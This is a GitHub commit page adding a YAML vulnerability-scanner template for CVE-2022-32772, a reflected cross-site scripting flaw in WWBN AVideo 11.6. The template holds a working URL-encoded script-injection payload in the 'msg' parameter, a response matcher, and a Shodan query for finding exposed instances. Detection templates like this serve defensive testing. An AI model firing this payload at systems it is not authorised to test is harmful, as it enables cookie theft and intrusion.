Merge pull request #5233 from arafatansari/patch-75

Create CVE-2022-32772.yaml
patch-1
Prince Chaddha 2022-08-29 22:34:02 +05:30 committed by GitHub
commit 0d53578c20
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2022-32772
info:
name: WWBN AVideo 11.6 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "msg" parameter which is inserted into the document with insufficient sanitization.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
- https://nvd.nist.gov/vuln/detail/CVE-2022-32772
classification:
cve-id: CVE-2022-32772
metadata:
verified: true
shodan-query: http.html:"AVideo"
tags: cve,cve2022,avideo,xss,wwbn
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'avideoAlertInfo("</script><script>alert(document.cookie);</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200